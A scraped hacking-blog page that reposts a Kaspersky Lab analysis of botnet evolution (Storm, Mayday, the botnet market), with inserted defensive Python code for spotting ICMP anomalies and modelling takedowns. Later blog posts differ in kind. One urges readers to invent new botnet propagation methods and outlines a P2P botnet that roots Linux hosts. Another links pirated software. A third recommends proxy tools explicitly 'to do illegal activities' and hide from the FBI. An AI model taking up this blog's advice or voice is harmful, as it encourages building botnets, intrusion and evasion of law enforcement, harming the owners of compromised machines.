The backdoors, which are Trojan programs by nature, were designed to work without the user's knowledge or consent. To control an infected computer, a cybercriminal had to establish a connection with each infected machine individually. The first backdoors worked on local area networks based on the TCP/IP protocol stack and demonstrated, in essence, the possibilities to exploit the Windows API in order to control a remote machine.
Even in the early 2000s, remote administration client programs were already able to control several machines at the same time. However, unlike today's backdoors, NetBus and BackOrifice2000 operated as network servers: they opened a predefined port and passively waited for the master to connect (the contemporary backdoors which are used to create botnets establish a connection on their own).
A malicious user then came up with the idea that computers infected with backdoors should establish connections themselves and that they should always be visible online (on the condition that the machine is switched on and working). This user must almost certainly have been a hacker, because new-generation bots employed a communication channel traditionally used by hackers – IRC (Internet Relay Chat). It is also likely that the development of new bots was made easier by the fact that bots working in the IRC system were open source (even though these bots were not designed for remote administration purposes but to respond to user requests such as questions about the weather or when another user had last appeared in chat).
When infecting a computer, the new bots connected to IRC servers on a predefined IRC channel as visitors and waited for messages from the botnet owner. The owner could come online at any time, view the list of bots, send commands to all infected computers at once or send a private message to one infected machine. This was the original mechanism for implementing a centralized botnet, which was later christened C&C (Command & Control Center).
Developing such bots was not difficult because the IRC protocol has simple syntax. A specialized client program is not required to use an IRC server – a universal network client, such as Netcat or Telnet, can be used.
Information about the new IRC botnets spread rapidly. As soon as articles about them began to come out in hacker magazines, a new breed of malicious users appeared: botnet 'hijackers'. These people probably knew as much as botnet owners, but they were after easier money. They looked for IRC channels that had suspiciously large numbers of visitors, entered these channels, studied the botnet and 'hijacked' it. This was done by seizing control of the network, redirecting bots to other, password-protected, IRC channels and the result was full control over somebody else's network of infected machines.
The next stage in the evolution of botnets was marked by moving control centers onto the World Wide Web. First, hackers developed tools for remotely controlling servers based on such popular script engines as Perl and PHP or, more rarely, ASP, JSP and a few others. Then somebody developed a method by which a computer on a local area network could connect to a server on the Internet; this made it possible to control the computer from anywhere in the world. Descriptions of the method for remotely controlling computers on local area networks which bypassed such protection as proxy servers and NAT were published online and it soon became popular in certain circles. Remote administration was based on establishing an HTTP connection with the administration server using the client computer's local settings. If the user configured an address, port, login and password for a proxy server, an authorization mechanism was automatically activated in a dynamic-link library providing HTTP support (Wininet.dll). From a programmer's viewpoint, this was a simple and accessible solution.
The development of semi-legitimate remote administration tools that could be used to evade protection on machines in local area networks and to gain remote access to such computers paved the way for web-oriented botnets. A little later, a simple script was developed for controlling small computer networks and cybercriminals found a way of using such controlled networks for making money.
Web-oriented botnets proved a very convenient solution, which remains popular to this day. A large number of computers can be managed using any device that has Internet access, including a mobile phone that supports WAP/GPRS. And even a child can learn to use a web interface. The further development of the Internet and improved web development technologies were also conducive to the use of web-oriented botnets.
There were also attempts to create botnets controlled via IM services. However, IM botnets never became very widespread, particularly because they require creating IM accounts. It is difficult to register a large number of accounts automatically as systems which protect against automated registrations are constantly modified.
This was not the end of botnet evolution: after trying all available protocols, botnet developers turned their attention to network architecture. It turned out that botnets with classic architecture (i.e. a large number of bots with one command and control center) are very vulnerable, since they depend on a critical node – the command and control center. If this is disabled, control over the entire network will be lost. Models based on simultaneously infecting computers with different bots connecting to different command and control centers sometimes work, but such botnets are much harder to maintain, since two or three C&Cs need to be controlled at the same time.
Experts believe that P2P botnets, which do not have a C&C, could become both highly effective and pose a serious threat. All that the zombie network's owner needs to do is send a command to one of the computers on the network, and the bots will spread the command to other computers in the botnet automatically. In principle, each computer on a botnet can connect to any other computer in the same zombie network. Experiments related to creating such networks have been conducted for quite some time, but the first large botnet using P2P architecture did not appear until 2007. It is P2P botnets that have attracted the most attention, and are the IT security industry's greatest cause for concern.

P2P botnets

The Storm Botnet

In 2007, the attention of security researchers was attracted by a P2P botnet created using a malicious program known as the Storm Worm. Authors of the Storm Worm were spreading their creation so rapidly that it seems as though they had set up a conveyor belt to create new versions of the malicious program. From January 2007 onwards, we have detected between three and five new Storm Worm (Kaspersky Lab classifies it as Email-Worm.Win32.Zhelatin) variants a day.
Some experts believe that the Storm Worm is a malicious program designed to build new-generation zombie networks. Clearly, the bot is being developed and distributed by professionals, and both the zombie network architecture and its defense are well-designed. The following facts bear this out:
  • The bot code mutates, making it similar to polymorphic viruses. However, the Storm Worm is different in that the code that conducts the mutation operates on a dedicated computer on the Internet rather than within the program itself (as is the case with polymorphic viruses). This mechanism is called server-side polymorphism.
  • Mutation takes place at a relatively high rate (hourly mutation has been recorded) and, importantly, the mutation takes place on the server side, making antivirus database updates ineffective for many users.
  • The Storm botnet is protected against the curiosity of security analysts. Many antivirus companies regularly download new copies of the worm from the servers used to spread the malicious program. When frequent requests from the same address are detected, bots receive the command to launch a DDoS attack on that address.
  • The bot malware attempts to remain as inconspicuous as possible on infected machines. Obviously, malicious programs that are constantly launching attacks are more easily detected by users and system administrators. Therefore, controlled activity that does not use a large amount of system resources is the safest from a malicious program's point of view.
  • Instead of communicating with a central server, the Storm Worm only connects to a small number of 'neighbor' computers on the infected network. This makes identifying all zombie machines on a P2P network practically impossible. The same principle can be used for setting up resistance groups: every member of a group knows only a few other members and the failure of one agent does not mean the failure of the entire group.
  • The authors of the worm are constantly changing the methods used to spread it. Originally, the malicious program was distributed as an attachment to spam messages (specifically, in an attachment that looked like PDF files). Later, attachments were replaced with links to infected files inserted into spam messages. There were also attempts to automatically post comments containing links to infected web pages to blogs. Whatever the method used to spread the malicious program, its authors employed sophisticated social engineering techniques.
The Storm botnet has caused numerous problems. Apart from mass-mailing of spam, it is suspected that the botnet was used in a number of large-scale DDoS attacks across the globe. According to some researchers, the Storm botnet was implicated in the cyber attack on Estonia in 2007. The damage such a network could potentially cause makes ISPs and Internet hosting providers uneasy. Adding to the uncertainty is the fact that the size of the Storm botnet remains unknown. While other zombie networks that are fully or partially dependent on a C&C can be seen in their entirety (because the C&C sees each zombie computer connected to the botnet), no expert has seen a list of infected machines which make up the Storm Botnet. Estimates vary, putting the size of the botnet at between 50,000 and 10,000,000 zombie computers.
By the end of 2007, the Storm botnet seemed to have melted away, although we still detect several new versions of the bot every day. Some experts believe that the zombie network was broken up into parts and sold, while others think that the botnet proved unprofitable; the considerable costs of development and support could not be covered by the income it generated.

Mayday

Mayday is another interesting botnet, and technically it differs slightly from its forerunners. The bot (Kaspersky Lab classifies it as Backdoor.Win32.Mayday) and the zombie network it creates bear this name because the word was part of a domain name used by one variant of the malicious program.
Mayday is a botnet based on P2P architecture. After launching, a bot connects to the web server specified in the program's body, registers itself in the server database and receives a list of all bots on the infected computer network (in the case of the Storm Worm, each bot received only a partial list). Then the bot establishes peer-to-peer connections with other bots in the zombie network.
We found six different servers around the world (in the UK, the US, the Netherlands and Germany) which bots connected to when creating the botnet. By early March 2008, only one server was still operational, with about 3,000 bots registered on it (compare this to the Storm botnet, which at the most conservative estimates included tens of thousands of infected computers). Network size is not the only criterion in which Mayday is inferior to its 'big brother' Storm: the Mayday botnet uses a non-encrypted network communication protocol, the malicious code has not been tweaked to hinder analysis by antivirus software and, most importantly, new bot variants are not released with anything nearing the frequency we saw with new variants of the Storm Worm. Backdoor.Win32.Mayday was first detected by Kaspersky Lab in late November 2007, and since then just over 20 different variants of the malicious program have made it into our collection.
As regards new technologies, it is worth noting two non-standard approaches implemented in the botnet.
First of all, the Mayday network uses peer-to-peer (P2P) communication based on ICMP messages with a 32-byte payload.
Most users are familiar with ICMP (Internet Control Message Protocol) because it is used by the PING utility to check whether a network host is accessible. However, the protocol offers a much more extensive range of functions than this. Wikipedia gives the following definition of ICMP: “The Internet Control Message Protocol (ICMP) is one of the core protocols of the Internet protocol suite. It is chiefly used by networked computers' operating systems to send error messages—indicating, for instance, that a requested service is not available or that a host or router could not be reached.”
Figure 3 shows a screenshot of a packet sniffer program that has registered the transmission of ICMP packets from a Mayday bot. None of the bots previously known to us used ICMP to transmit data.


Figure 3. ICMP packets sent by a Mayday bot
ICMP is used to check bot accessibility on an infected computer network and for bot identification. Since Mayday bots are designed to work under Windows XP SP2, once launched they modify the Windows firewall rules in order to receive ICMP packets.
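A defender-side heuristic for the ICMP usage described above, as an added example that is not part of the original article: it parses IPv4/ICMP echo packets and flags host pairs exchanging 32-byte echo payloads that are not the stock Windows or Linux ping patterns. The packet bytes are constructed for the demonstration, and since the Mayday wire format itself is not documented on the page, this is a generic anomaly check rather than a signature.

```python
import struct
from collections import Counter

# 32-byte data the Windows ping utility sends by default (well-known pattern).
WINDOWS_PING_PAYLOAD = b"abcdefghijklmnopqrstuvwabcdefghi"
ICMP_ECHO_REPLY, ICMP_ECHO_REQUEST = 0, 8


def parse_ipv4_icmp(pkt: bytes):
    """Return (src, dst, icmp_type, payload) for an IPv4/ICMP packet, else None.
    Checksums are not verified; this is a triage parser, not a full stack."""
    if len(pkt) < 20 or pkt[0] >> 4 != 4:
        return None
    ihl = (pkt[0] & 0x0F) * 4
    total_len = struct.unpack("!H", pkt[2:4])[0]
    if pkt[9] != 1 or len(pkt) < ihl + 8 or total_len > len(pkt):
        return None                      # not ICMP, or truncated
    src = ".".join(str(b) for b in pkt[12:16])
    dst = ".".join(str(b) for b in pkt[16:20])
    icmp = pkt[ihl:total_len]
    # Echo header is 8 bytes: type, code, checksum, identifier, sequence.
    return src, dst, icmp[0], icmp[8:]


def looks_like_ordinary_ping(payload: bytes) -> bool:
    """True for payloads produced by the stock ping tools."""
    if payload == WINDOWS_PING_PAYLOAD:
        return True
    # iputils (Linux) ping: timestamp in the first 16 bytes, then each data
    # byte equals its own offset (0x10, 0x11, ...), whatever the length.
    if len(payload) > 16:
        return payload[16:] == bytes(i & 0xFF for i in range(16, len(payload)))
    return False


def flag_suspicious_icmp(packets, min_count=3):
    """Per (src, dst) pair, count echo packets carrying exactly 32 bytes that
    are not a stock ping pattern; return the pairs at or above min_count."""
    counts = Counter()
    for pkt in packets:
        parsed = parse_ipv4_icmp(pkt)
        if parsed is None:
            continue
        src, dst, icmp_type, payload = parsed
        if icmp_type not in (ICMP_ECHO_REQUEST, ICMP_ECHO_REPLY):
            continue
        if len(payload) == 32 and not looks_like_ordinary_ping(payload):
            counts[(src, dst)] += 1
    return {pair: n for pair, n in counts.items() if n >= min_count}


def build_icmp_echo(src, dst, payload, icmp_type=ICMP_ECHO_REQUEST, seq=1):
    """Assemble a minimal IPv4 + ICMP echo packet (constructed sample data;
    header checksums are left at zero because the parser ignores them)."""
    total_len = 20 + 8 + len(payload)
    ip_hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, total_len, 0, 0, 64, 1, 0,
                         bytes(int(x) for x in src.split(".")),
                         bytes(int(x) for x in dst.split(".")))
    icmp_hdr = struct.pack("!BBHHH", icmp_type, 0, 0, 1, seq)
    return ip_hdr + icmp_hdr + payload


# Constructed sample traffic: a normal Windows ping burst, a pair of hosts
# exchanging 32-byte non-ping payloads, and a single stray oddity.
SAMPLE_PACKETS = (
    [build_icmp_echo("10.0.0.5", "10.0.0.1", WINDOWS_PING_PAYLOAD, seq=i) for i in range(5)]
    + [build_icmp_echo("10.0.0.7", "10.0.0.9", b"\xde\xad" * 16, seq=i) for i in range(4)]
    + [build_icmp_echo("10.0.0.3", "10.0.0.1", b"\x00" * 32)]
)

if __name__ == "__main__":
    for pair, n in flag_suspicious_icmp(SAMPLE_PACKETS).items():
        print(f"{pair[0]} -> {pair[1]}: {n} echo packets with non-ping 32-byte data")
```

Expect false positives from tools that customise the ping payload; the threshold and the per-pair counting are there to surface sustained exchanges, not single packets.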
The second and perhaps most important thing that is different about a Mayday botnet is its command and control center.
Command and control centers of web-oriented botnets use a mechanism known as CGI (Common Gateway Interface). By design, web server technology allows for the use of executable files as an implementation of CGI. Later, a variety of script engines appeared as well. A CGI application generates the content of a web page requested by a user in real time, ensuring execution of the program and displaying the results of its operation instead of static data from the web server. A CGI script works in a similar way, but it needs an interpreter (script engine) to output the results of its operation. As a rule, command and control centers for web-oriented botnets are based on script engines.
In cooperation with law-enforcement agencies, we managed to obtain a copy of the program used in a Mayday C&C. The server-side software of Mayday is a 1.2 megabyte standalone ELF file (the Linux executable file equivalent to Windows EXE files) without any modules. It does not require the system to have a script engine. At first glance, there is nothing strange about the fact that authors of Mayday developed a CGI application instead of a CGI script. However, it does raise a number of questions.
It is far more difficult to develop a CGI application than it is to write a CGI script, because it requires special effort to make the code stable and reliable. Currently, 99% of web development uses script engines, while monolithic CGI executables are developed only when it is absolutely necessary to optimize everything down to the smallest detail. As a rule, this approach is taken by large corporations when developing projects that have to be able to function under huge loads. For example, monolithic CGI programs are used in such web systems as eBay, Paypal, Yahoo! etc.
But why was it necessary to create a monolithic executable file for the Mayday botnet? One possible reason is that the developers wished to make it harder for 'outsiders' to edit, reconfigure and resell a command and control center. Whatever the case, our analysis of the structure of server software used by the Mayday botnet shows that this was a serious development project (the code is tidy, a universal system of classes was devised for the application) that required a well-organized developer team. Moreover, to create software for the Mayday botnet, cybercriminals must have had to work on two projects rather than one, developing software both for Windows and for Linux.
Kaspersky Lab did not detect any new variants of the Mayday bot in spring 2008. Perhaps the malicious program's authors have taken a timeout and the Mayday botnet will resurface in the near future.

The botnet business

The answer to the question why botnets keep evolving and why they are coming to pose an increasingly serious threat lies in the underground market that has sprung up around them. Today, cybercriminals need neither specialized knowledge nor large amounts of money to get access to a botnet. The underground botnet industry provides everyone who wants to use a botnet with everything they need, including software, ready-to-use zombie networks and anonymous hosting services, at low prices.
Let's take a look at the 'dark side' of the Internet and see how the botnet industry works to benefit zombie network owners.
The first thing needed to create a botnet is a bot, i.e. a program that can remotely perform certain actions on a user's computer without the user's knowledge. Software for creating botnets can be easily purchased on the Internet by simply finding an appropriate advertisement and contacting the advertiser.


Figure 4. Advertisement for the sale of a bot and administration panel (translated from Russian)
Bot prices vary from $5 to $1000, depending on how widespread a bot is, whether it is detected by antivirus products, what commands it supports, etc.
A simple web-oriented botnet requires a hosting site where a command and control center can be located. Such sites are readily available, and come complete with support and anonymous access to the server (providers of anonymous hosting services usually guarantee that log files will not be accessible to anybody, including law enforcement agencies). Advertisements like the one shown below are abundant on the Internet.


Figure 5. Hosting services advertisement for would-be botnet owners
When a C&C site has been created, what's needed next are computers infected by a bot. One option is to buy a ready-made network with somebody else's bot installed. Since stealing botnets is a common practice, most buyers prefer to replace both the malicious programs and the command and control centers with their own, thereby gaining guaranteed control over the botnet. A command will be sent to the bot on the newly-purchased network to download and install a new bot (with a new C&C address) and then self-destruct. This replaces the 'wrong' bots and the botnet begins communicating with the new C&C center. This 'reloading' of botnets is also helpful for protecting them and ensuring anonymity, since IT security experts may already be aware of the 'old' C&C and the 'old' bot.
Unfortunately, building a new botnet is not very hard, either: tools that simplify this task are available. The most popular among them are software packages known as Mpack, Icepack and WebAttacker. They infect the systems of users who visit a malicious web page by exploiting vulnerabilities in browsers or browser plugins. Such software packages are called mass web infection systems or simply ExploitPacks. After an exploit has performed its function, the browser downloads an executable file from the Internet and runs it. The file is a bot program, which adds a new zombie computer to the botnet and gives control over it to the cybercriminal.
Sadly, these tools are so accessible that even adolescents can easily find them and they even try to make money by reselling them.


Figure 6. A 16-year-old selling Mpack
Interestingly, ExploitPacks were originally developed by Russian hackers but later they found an audience in other countries as well. These malicious programs have been localized (showing that they were commercially successful on the black market) and are now actively used in China, among other places.


Figure 7. The original Russian version of IcePack


Figure 8. A localized Chinese version of Icepack
The easier it is to use a system the more popular and successful it is with cybercriminals. Developers of such systems as C&C software or ExploitPacks realize this and develop user-friendly installation and configuration mechanisms for their products in order to make them more popular and increase demand.
For example, installation of a command and control center usually involves copying files onto a web server and using the browser to launch an install.php script. A web interface makes installation much easier: all a cybercriminal needs to do to configure and launch a command and control center is fill in all the web form fields correctly.


Figure 9. C&C web installer
It is well known in the cybercriminal world that sooner or later antivirus products will start detecting any bot program. When this happens, the infected machines on which an antivirus product is installed are lost to the cybercriminals, while the rate of new infections significantly deteriorates. Botnet owners use a number of methods to retain control of their networks, the most effective of which is protecting malicious programs from detection by processing the malicious code. The black market offers a broad range of services related to the encryption, packing and obfuscation of malicious code.

Figure 10. An advertisement offering help concealing code from antivirus products
Everything that is needed to successfully run a botnet is available on the Internet. At the moment, it's impossible to arrest the development of the botnet industry.

Conclusion

Today, botnets are among the main sources of illegal income on the Internet and they are powerful weapons in the hands of cybercriminals. It is totally unrealistic to expect that criminals will relinquish such an effective tool. Security experts view the future with some trepidation as they anticipate the continued development of botnet technologies.
What makes botnets increasingly dangerous is that they are becoming easier and easier to use. In the near future, even children will be able to manage them. The ability to gain access to a network of infected computers is determined by the amount of money cybercriminals have at their disposal rather than whether they have specialized knowledge. Additionally, the prices in the well-developed and structured botnet market are relatively low.
It may not only be cybercriminals who have an interest in creating international botnets. Such botnets can be used by governments or individuals to exert political pressure in tense situations. In addition, anonymous control of infected machines that does not depend on their geographic location could be used to provoke cyber conflicts. All this takes is organizing a cyber attack on one country's servers from computers located in another country.
Networks which unite the resources of tens or hundreds of thousands or even millions of infected computers, have the potential to be extremely dangerous – a potential which (luckily!) has not yet been fully exploited. Virtually all this cyber power stems from infected home computers, which make up the overwhelming majority of zombie machines exploited by cybercriminals.
Think of ten friends or acquaintances who have computers – out of the ten, one of them is likely to own a machine that is part of a zombie network. Could that person be you?
Source:
Kaspersky Lab

Botnets: a Serious Threat???


What are Botnets???


This article, which I found, explains botnets, gives an example of usage, and provides some good examples.
[What]
A botnet is a group of computers or servers all compromised with the same backdoor. The interesting thing about botnets is that these backdoors often have the ability to interact with other members of the botnet, and can also be controlled by the botnet's owner. This means a single command, e.g. DDoS Microsoft.com, can flow down a chain of command in an instant, telling each member of the botnet to follow it. They also often leave backdoors accessible to the botnet user, and some even have built-in protocols for updating themselves. There are multiple chains of command that have been used in botnets, and these are:

P2P botnets: using these, a command can be sent by the hacker to a single member of the botnet, and this single bot will pass the command on to a handful of other members, which carry on the chain, and so on and so forth. The advantage of this is that you cannot stop the botnet by taking out one member; you would have to block the botnet completely. The problem is that it is easy for individual bots to become separated from the rest of the net, usually resulting in them being fixed.
Hierarchical botnets, which have different members assigned "ranks" in the command chain and are given specific bots to manage. Using this, the hacker might send a command to 4 different bots, which each pass the message on to 100, which each pass it on to 100. The problem with these is that the botnet can be shut down by removing the hack from one of the higher-up bots. The good thing about these is that they can be very easily automated, and can pass reports about the computers up the chain as well as pass exploit upgrades down.
Single-server botnets, in which all bots take their commands from one computer; these are very easy to make but are near enough useless.
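To make the resilience comparison concrete, here is an added example (not code from the original post) that models the three command chains above together with the "critical node" point from the Botnet evolution section: it builds a single-server, a hierarchical and a P2P graph of 39 bots each and counts how many bots still receive commands after a defender removes the k best-connected nodes. The sizes, the ring-shaped peer lists and the greedy takedown order are assumptions made for the demonstration.

```python
from collections import deque

CONTROLLER = "cc"   # the owner's C&C node in the centralised models


def reachable(adj, start, removed=frozenset()):
    """Nodes reachable from start over directed edges, skipping removed nodes."""
    if start in removed or start not in adj:
        return set()
    seen, queue = {start}, deque([start])
    while queue:
        node = queue.popleft()
        for nxt in adj.get(node, ()):
            if nxt not in seen and nxt not in removed:
                seen.add(nxt)
                queue.append(nxt)
    return seen


def single_server(n_bots):
    """One C&C that every bot contacts directly; bots never relay commands."""
    adj = {CONTROLLER: [f"bot{i}" for i in range(n_bots)]}
    for bot in adj[CONTROLLER]:
        adj[bot] = []
    return adj


def hierarchical(fanout, depth):
    """C&C -> `fanout` lieutenants -> each manages `fanout` more, `depth` levels."""
    adj = {CONTROLLER: []}
    frontier, counter = [CONTROLLER], 0
    for _ in range(depth):
        next_frontier = []
        for parent in frontier:
            for _ in range(fanout):
                child = f"bot{counter}"
                counter += 1
                adj[parent].append(child)
                adj[child] = []
                next_frontier.append(child)
        frontier = next_frontier
    return adj


def p2p_ring(n_bots, neighbours):
    """Every bot knows only its next `neighbours` peers on a ring (links are
    bidirectional, as in a Storm-style partial peer list); the owner may
    inject a command at any surviving bot."""
    names = [f"bot{i}" for i in range(n_bots)]
    adj = {n: [] for n in names}
    for i, name in enumerate(names):
        for step in range(1, neighbours + 1):
            peer = names[(i + step) % n_bots]
            adj[name].append(peer)
            adj[peer].append(name)
    return adj


def controlled_bots(adj, entries, removed=frozenset()):
    """Largest number of bots (controller excluded) that a command injected
    at any surviving entry node still reaches."""
    best = 0
    for entry in entries:
        best = max(best, len(reachable(adj, entry, removed) - {CONTROLLER}))
    return best


def greedy_takedown(adj, entries, k):
    """Defender removes the k nodes with the most links (in + out), then we
    measure what the owner still controls. Ties keep insertion order."""
    degree = {n: len(adj[n]) for n in adj}
    for links in adj.values():
        for target in links:
            degree[target] += 1
    victims = sorted(adj, key=lambda n: -degree[n])[:k]
    return controlled_bots(adj, entries, frozenset(victims))


def compare(k):
    """Bots still under control after removing k nodes from each topology."""
    ss = single_server(39)
    hi = hierarchical(3, 3)            # 3 + 9 + 27 = 39 bots
    pp = p2p_ring(39, 3)
    return {
        "single_server": greedy_takedown(ss, [CONTROLLER], k),
        "hierarchical": greedy_takedown(hi, [CONTROLLER], k),
        "p2p": greedy_takedown(pp, list(pp), k),
    }


if __name__ == "__main__":
    for k in (0, 1, 3):
        print(f"nodes removed: {k} -> still controlled: {compare(k)}")
```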


[Propagation]
Botnets can be propagated by the hacker themselves, e.g. whenever they root a server or trojan a computer they add their program in too, run it and that computer becomes a bot. Another way is by mimicking worms and spreading through e-mail, P2P or instant messaging. Be imaginative, there are many ways of propagating that haven't been tried yet.

[usage]
I will give an example of how a p2p botnet would be structured.
The bot's propagation method is to exploit a flaw in the security system of Linux, and use it to get root access.
The bot has a P2P structure, and can pass patches down the chain as well as commands.
The bot is automated by adding any computers it hacks to its own list of child bots (ones under its own command), and runs a check similar to ping to test whether the net is up on the child before sending commands/patches.



[Famous Examples]


The Storm Worm:
This is an e-mail-spread worm that takes over Windows machines and injects a driver into the Windows kernel to keep root. It currently has control of between 1 and 10 million Windows machines around the world. It is extremely flexible, and has avoided getting an antivirus signature for a massive amount of time.
There are many examples of these on Wikipedia, and Google yields some interesting results.

Track Any E-mail

Go to this link and register yourself, and get tracking of all e-mails sent by your friends.....

www.mailtracking.com

Friday, 8 January 2010

Host A Web Server on Your Home computer

Opera Unite:

Create a web server using your home computer with HFS (HTTP File Server). This solution uses a combination of techniques which helps you create a file server for downloading music files or even hosting a small site for your family.
Today Opera came out with an extraordinary application called Opera Unite. This application turns any computer or device running Opera into a web server. So how does it work? It's pretty much the same as what HFS was doing, but much more advanced.
  • First, get a unique number for your computer.
  • This is then linked to your computer.
  • Then you access the URL, which in turn connects to the software running on your computer.
The advantage you get is that your IP address is tracked automatically, which previously was being done by the No-IP account. I would call it just plug and play, as you don't have to worry about configuring too much here.
You can find the complete and in-depth tutorial on the Opera Development Blog (via Boy Genius).

FETCH LINK:

http://rs768.rapidshare.com/files/292619999/_www.dl4all.com_Opera_Unite_10.10.1833_Beta_Multilanguage_Portable_kastrioTT_.rar

Thursday, 7 January 2010

Proxy and IP Solutions

Fellas, I give some proxy software. Use those to do illegal activities.. It's FOOLPROOF software.. Newbies, take care while using it...

If you use those, you can play hide and seek games with any security org.. like FBI, CBI, JBI.. etcetera...
Look, I'm not kidding..!!

If you don't know from where to fetch it... I recommend you locate yourself to www.filecrop.com

Free proxy server software:

1. VPNs (Virtual Private Networks) :

To start with, I will put VPNs in first place. Virtual Private Networks (VPNs) not only help you unblock myspace, bebo, friendster or orkut login, but also help you to remain as anonymous as possible on the web.
I have informed you about two VPNs: Itshidden.com and CyberGhost proxy software.
I personally use Itshidden.com as my proxy server software as it is giving me good proxy speed. I have tried out CyberGhost too, but Itshidden.com is much better than the CyberGhost free proxy software.

2. Tor :

This is used on a large scale on the internet to maintain online anonymity. This can also be used to get unblocking proxy servers to unblock myspace, bebo, friendster, orkut login. Tor is a network of tunnels which allows users to maintain their privacy on the internet. It is just the same as VPNs.

3. Hotspot Shield :

I am really impressed with the speed of the proxy servers it provides. It is one of the fastest proxy programs I have seen. But, I am ranking it low because of its advertisements. Its free proxy server service shows you ads which are really annoying, and you have to install add-ons like Adblock Plus to remove these ads. Otherwise, it's the best proxy software.

4. Ultrasurf :

If you are looking for free full-version proxy software, which can provide you with mostly US-based proxy servers to unblock myspace, bebo, friendster or orkut login, then you should use Ultrasurf and surely you'll love it. It provides you with 3 proxy servers which have good speed, and it also displays the percentage of speed to help you choose the best proxy server out of the 3 available free proxy servers.

5. Hide my IP :

This proxy software was requested by many readers, and I received many e-mails after I posted an article on it. No doubt, Hide my IP is a good proxy software. But, it has its own drawback of being a trial version, and you have to pay to use it for a long time.

6. Hide Your IP Address :

This free proxy software not only provides you with free proxy servers, but also has the useful feature of a Proxy Checker. You can adjust your level of anonymity and proxy server speed from the settings tab of the Hide Your IP Address proxy software.
Also, there is other free proxy software like ProxyWay and ProxySwitcher which needs to be mentioned here. I hope you all will be able to get your best free proxy software to unblock myspace, bebo, friendster, orkut login. If you have any problem in using free proxy software to unblock myspace, bebo, friendster, orkut login, please mention it in the comments.
Enjoy free proxy software to unblock myspace, bebo, friendster, orkut login...